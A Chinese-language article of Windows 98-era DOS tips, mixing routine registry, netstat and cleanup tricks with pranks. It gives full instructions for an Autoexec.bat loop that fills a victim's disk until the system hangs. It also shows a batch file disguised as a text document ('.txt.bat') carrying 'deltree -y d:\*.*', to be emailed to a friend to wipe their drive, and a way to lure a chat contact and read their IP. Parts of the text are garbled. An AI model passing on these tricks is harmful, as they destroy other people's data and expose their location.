DOS利用全接觸
DOS利用全接觸
一、給非法用戶設定個小陷阱
在Windows目錄中建立一個winstart.bat文件(如果已經存在該檔案,則按如下所顯示修改其內容),並在該檔案中加入以下幾行指令:
@echooff
choice/c:&/n/3
上面程式碼中的「&」為我們設定的密碼,可以自行設定。這樣,在啟動Windows時系統將要求你輸入密碼,表現在螢幕上就是游標一閃一閃的,造成非法用戶以為Windows當機的假像,有時,就連部分高手也會上當受騙。當我們要進入系統時,只要輸入「&」即可
二、用「魔咒」跟電腦開個玩笑
怎樣讓電腦當機呢?當然有很多方法,這裡介紹一種非常簡單的方法。開啟C碟根目錄下的Autoexec.bat文件(如果不存在,可以自行建立),然後將其中的內容全部移除,輸入下面兩行指令:
@cd>>notepad
@%0
然後儲存就可以了。解釋一下上面的指令:
「@」符號表示在DOS下不顯示後面的指令,這樣就可以把危險指令掩藏起來,來個神不知鬼不覺。「cd>>notepad』就是把現用的目錄拷貝成一個名為notepad的文件,「>>」表示儲存到,和「>」不同的是,「>>」會將儲存結果加到文件的最後,而「>」是覆蓋的意思。所以,用「>>」的結果就是儲存的文件越來越大!「%0」的意思是不斷地重複上面一條指令,其結果就是名為notepad的文件會越來越大,直到填滿整個硬碟,此時,你的電腦就只有當機一條路可以走了。如果你重新啟動電腦,只會看到;Starting MS-DOS...之後就會當機了,而且期間會不接受任何指令。要去掉這條「魔咒」,只要用軟碟啟動電腦,或跳過Autoexec.bat文件的執行,再把上面的指令去掉就行了。
三、在DOS下解鎖註冊表編輯器
大家知道,註冊表編輯器被禁用後很是棘手,特別是reg文件開啟方式被更改後,就無法通過匯入reg文件來解鎖註冊表了。不過,在DOS下我們也可以給註冊表解鎖,具體方法是:在純DOS下,輸入如下指令:REGEDIT/DHKEY_CURRENT_U SER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools。Enter鍵,會出現一個標題欄為「註冊表編輯器」的對話視窗,裡面寫著「,確實要把HK EY_CURRENT_USER\......DisableRegistryTools內的訊息增加到註冊表嗎?」點擊「確定」即可。瀏覽惡意網頁導致註冊表被禁用後,不妨試試本方法。
四、用Doskey指令「封殺」format
對格式化程序~rmat指令大家一定很害怕吧?某些病毒一侵入,就給你的硬碟來個格式化,後悔都來不及,只得重裝系統,不僅麻煩,而且資料不保!現在你不必害怕了,在DOS下按鍵輸入如下指令:C:\doskeyFORMAT=BadCommandOrfil ename!Enter鍵,就將format指令給「封殺」了,當病毒或惡意程序格式化你的硬碟時,系統將會顯示:BadcommandOrfilename!如果你自己想格式化,怎麼辦呢?可以在DOS下按鍵輸入如下指令:C:\doskeyFORMAT=,然後回 車就可以了。註:Doskey為DOS提供的鎖定指令。
五、在DOS下檢查是否中木馬
一般說來,中了木馬的機器會開有特定的連接阜。一般一台個人用的Win9x系統在開機後最多只有137、138、139這3個連接阜(若上網衝浪會有其他連接阜,這是本地機與網上主機通訊時開啟的,如IE會開啟1025、1026、1027……,QQ會開啟400 0、4001……)。由於Netstat指令是通過讀取記憶體中的「kernelroutingtables」來獲得網路訊息,所以用它來發現一般的木馬還是很容易的。在DOS指令行下用netstat-na指令可以看到本地機所有開啟的連接,如:
C:\WINDOWS>nelstat-na
ActiveCofmectiogs
ProtoLocalAddressForeignAddressState
TCPXXX.XXX.XXX.XXX:1370.0.0.0:0LISTENING
TCPXXX.XXX.XXX.XXX:1380.0.0.0:0LISTENING
TCPXXX.XXX.XXX.XXX:1390.0.0.0:0LISTENING
UDPXXX.XXX.XXX.XXX:137*:*
UDPXXX.XXX.XXX.XXX:138*:*
發現有其他連接阜開啟的話就要查檢視子,你很有可能中木馬了。怎麼樣?在DOS下也可以檢查是否中木馬了,很棒吧!
六、在DOS下開啟1E的「1nlernet內容」視窗
有時在瀏覽了某些惡意網頁後,會導致IE的「Internet內容」對話視窗無法開啟,這時我們可以在DOS視窗下輸入:RunDll32.exeshell32.dll,ControlRunDLLinetcpl.cpl指令,就可開啟IE的「Inter net內容」對話視窗。要注意「ControlRunDLL」的大小寫以及它前面的逗號(,)不要忘記了。
七、在DOS下使用註冊表編輯器
註冊表編輯器Regedit.exe其實是一個雙棲型的程序,即可在Windows下執行,也可在DOS下執行。許多用戶可能已經知道在Windows下使用Regedit的方法,那麼在DOS下如何使用註冊表編輯器呢?
在DOS提示號下按鍵輸入Regedit指令,將出現一個說明 螢幕。此螢幕指出了其指令行參數及其使用方法。
語法:
Regedit[/L:system][/R:user]filenamel
Regedit[/L:system][/R:user]/Cfilename2
Regedit[/L:system][/R:userl/Efilename3
[regpath]
其中;
/L:system指定system.dat文件的存放位置。
/L:user指定user.dat文件的存放位置。
filenamel指定引入註冊表資料庫的檔案名。
/Cfilename2指定形成註冊表資料庫的檔案名。參數「/C」表示從後面指定的文件中重新產生整個註冊表。重建的註冊表文件往往比原來的小l/5到1/3,從而達到了最佳化的目的。
/Efilename3指定匯出註冊表文件的檔案名。
regpath指定匯出註冊表文件的開始關鍵字(預設為全部關鍵字)
現舉幾個例子說明regedit.exe在DOS下的使用方法。
[例1]將註冊表匯出到reg1.reg文件中。
regedit/Ereg1.reg
[例2]重新產生註冊表reg1.reg。
regedit/Creg1.reg
[例3]將reg.dat導人系統註冊表資料庫中。
regeditreg.dat
[例4]將CLK開始的關鍵字匯出註冊表資料庫,並命名為clk.reg。
regedit/Eclk.regclk
[例5]指定system.dat存放在D:\PIN中,將user.dat存放在E:\PWIN中,將reg.dat資料檔案形成一個新的註冊表資料庫。
regecht/L:D:\PWIN/R:E:\PWIN/Creg.Dat
八、用DOS指令查QQ好友的1P位址
查QQ好友的IP位址還用得著這麼麻煩嗎?給QQ打個修正檔不就行了嗎?不錯,這樣做是很簡單,但如果是新出的QQ,「修正檔」還沒有做出來,又該怎麼辦呢?為什麼不試試DOS指令呢?即簡單,又方便。
首先,用甜言蜜語、糖衣炮彈之類的武器把你想知道IP位址的那個人「請」到QQ的「二人世界」裡。接著,我們在DOS視窗(Win9x下叫DOS,Win2000下叫命令提示字元),輸入如下指令:netstat-n
你將看到:
ActiveConnection
PhotoLocalAddressForeignAddressState
TCP202.109.34.78:1200202.121.139.35:61555ESTABLISHED
TCP202.109.34.78:2694202.109.72.40:6667ESTABLISHED
TCP202.109.34.78:4869211.202.1.227:23ESTABLISHED
好傢伙,這麼多IP!那個才是我們要找的呢?別著急,往後看。我們現在推出「二人世界」,然後在DOS下再輸入一次:netstat-n
你將看到:
ActiveConnection
PhotoLocalAddressForeignAddressState
TCP202.109.34.78:1200202.121.139.35:61555TIME_WAIT
TCP202.109.34.78:2694202.109.72.40:6667ESTABLISHED
TCP202.109.34.78:4869211.202.1.227:23ESTABLISHED
看出前後兩次的區別了麼?沒有看出來?仔細看看,你會發現的。現在你知道了吧?對!和你聊天的人的IP就是202.121.139.35!你是怎麼知道的呢?我們在「二人世界」中要傳送消息,相互之間必然要通過UDP傳輸協定產生連接,此時自然是ESTABL ISHED了;而結束「二人世界」連接要中斷連線,自然就是TIME_WAIT了。
九、自動載入防火牆
有些朋友在上網時常忘記執行防火牆,病毒或木馬之類的程序就有可能乘虛而入!但是,如果每次啟動WINDOWS都自動啟動防火牆,由於不是每次開機都上網,因此有浪費系統資源之嫌。那麼,有沒有兩全其美的方法呢?
由於我們上網往往要發電子郵件,因此,如果能在收發郵件時自動開啟防火牆,不就解決了這個問題麼?下面以天網防火牆和OUTLOOKEXPRESS為例,說說如何在郵件客戶端執行之前開啟防火牆。
首先新增一個文本文件,在其中輸入以下內容:
STARTC:\PROGRA~1\SKYNET\FIREWALL\SNFW.EXE
STARTC:\PROGRA~1\OUTLOO~1,EXE\MSIMN.EXE
然後另存為GO.BAT即可(名字隨便起,只要是後面為BAT就可以了)。由於OUTLOOKEXPRESS預設值設定為啟動時傳送和接受郵件,只要我們執行GO.BAT,他就會自動啟動天網防火牆,接著就會啟動OE,OE就會連線上網,如此達到了上網即可 開啟防火牆的目的。這裡需要指出的是:DOS下不支持長檔案名,最多8個字串,所以ProgramFiles應寫成Progra~!,指令格式即為「start文件存放路徑」。
十、移除不必要的文件
在Windows下儲存著許多我們並個需要的文件,如Temp目錄和Rcenet目錄下的文件,資源回收桶中的文件以及IE的歷史記錄和Cookie等丈僕,如果手工來清除它們實在是太麻煩了,我們可以在Autoexec.bat中加入一些內容,使得每次啟動 Windows時就移除這些文件,這樣就省事多了!用記事本開啟C:\Autoexec.bat文件,編輯內容如下:
EchoY
ifexistc:\windows\temp\*.*delc:\windows\temp\*.*>nul
ifexistc:\windows\Tempor~1\*.*delc:\windows\Tempor~1\*.*>nul
ifexistc:\windows\History\*.*delc:\windows\History\*.*>nul
ifexistc:\windows\recent\*.*delc:\windows\recent\*.*>nul
ifexistc:\windows\cookies\*.*delc:\windows\cookies\*.*>nul
此批次處理第二行為移除臨時資料夾的內容;第三、四行為移除IE瀏覽器開啟網頁後遺留下的內容;第五行為移除「開始」→「我的文件」中的內容;第六行為移除資源回收桶裡的內容;第六行為移除Cookies。
十一、更改指定文件的日期
要修改名為XXX.exe(任意exe文件)的日期,可以在MS—DOS方式下按鍵輸入copyXXX.exe+,,(註:加號後緊跟2個逗號),系統詢問時按鍵輸入「Y」,即將文件更改為當前日期。
十二、恢復在DOS下移除的文件
Windows98的資源回收桶只能恢復在Windows裡移除的內容,用以下方法可恢復Windows98的DOS模式下移除的文件:先執行「Lock」指令,解除WindOWS對磁牒訪問的限制,再使用指令「UnDelete」恢復。或重新啟動進入DOS ,執行「UnDelete」也行,不過動作要快,否則被其他新增文件覆蓋了就沒有辦法了。
十三、在DOS下製作啟動碟
當Windows98系統崩潰而你又不得不重裝系統的時候,如果伯;以前忘了製作啟動碟,那麼不要著急,這時還可以在DOS環境下製作。具體方法是:執行Windows目錄下的Command資料夾中的一個名為Bootdisk的批次處理文件。執行後出現下 列訊息:
Pleasespecifythedriveletterofyourfloopydrive.
PresslforAOr
Press2forB:
Chooseanoption[1,2]?
一般都選項1,之後螢幕會出現—些英文訊息。放入一張磁牒後,按Enter鍵,…張啟動碟很快就製作成了。
十四、DOS中的註冊表修理指令
在DOS狀態下,輸入指令行「Scanreg/fix,系統會對現用的註冊表進行修復,如果你覺得系統有些不正常,試試這個指令吧,也許能解決問題。
十五、和朋友開個玩笑
這是個危險的遊戲,切記:只有真心想讓朋友痛揍一頓的人才可以使用!
用記事本編輯一個文本文件,裡面只有一句:
deltree-yd:\*.*,然後另存為「我的文章.txt.bat』
用E-mail附件傳送給他。由於Windows支持雙後面名,這樣,
在你的朋友看來這個文件就是:我的文章.txt。
誰又知道這是個批次處理文件呢?如果他雙按這篇所謂的「文章」,
那他D碟下的文件就不保了。防範方法:不要隨便開啟附件,如果實在想看,一定要用記事本開啟。將系統中的危險指令移除或改名。另外,讓系統能顯示雙重副檔名,在「檔案總管」中點擊「檢視(v)」→「資料夾選項」→「檢視」,將「隱藏已知檔案類型的副檔名 」前面的「√」去掉。
再次聲明:這樣做是很危險的!雖然這算不上病毒,但它們的危害有時比病毒還要大。
